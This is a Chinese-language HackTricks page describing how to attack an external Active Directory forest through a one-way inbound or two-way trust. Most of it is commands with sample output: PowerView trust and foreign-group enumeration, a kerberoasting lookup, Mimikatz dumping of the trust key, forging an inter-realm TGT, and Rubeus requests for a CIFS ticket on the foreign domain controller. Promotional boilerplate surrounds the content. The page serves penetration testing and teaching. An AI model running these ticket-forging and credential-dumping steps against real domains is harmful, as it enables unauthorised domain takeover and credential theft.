hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md

外部森林域 - 单向（入站）或双向

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

• 您在网络安全公司工作吗？ 想要看到您的公司在HackTricks中做广告吗？ 或者您想要访问PEASS的最新版本或下载HackTricks的PDF吗？ 请查看订阅计划!
• 发现我们的独家NFTs收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群或电报群或在Twitter上关注我🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

在这种情况下，外部域信任您（或彼此信任），因此您可以在其上获得某种访问权限。

枚举

首先，您需要枚举这种信任：

Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.

在先前的枚举中发现用户**crossuser位于External Admins组内，该组在外部域的DC内具有管理员访问权限**。

初始访问

如果您在另一个域中找不到用户的特殊访问权限，您仍然可以返回AD方法论并尝试从未经特权处理的用户进行权限提升（例如，像kerberoasting这样的操作）：

您可以使用Powerview函数来使用-Domain参数枚举其他域，如下所示：

Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName

冒充

登录

使用具有访问外部域权限的用户的凭据进行常规方法，您应该能够访问：

Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator

SID History Abuse

您还可以在跨森林信任中滥用SID History。

如果用户从一个森林迁移到另一个森林，并且未启用SID过滤，则可以添加来自另一个森林的SID，并且在通过信任进行身份验证时，此SID将被添加到用户的令牌中。

{% hint style="warning" %} 作为提醒，您可以使用以下方式获取签名密钥

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local

{% endhint %}

您可以使用受信任的密钥签署一个冒充当前域用户的TGT。

# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

完全模拟用户

# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

• 你在网络安全公司工作吗？想要看到你的公司在HackTricks中被宣传吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？查看订阅计划!
• 探索PEASS家族，我们的独家NFT收藏品
• 获取官方PEASS和HackTricks周边
• 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。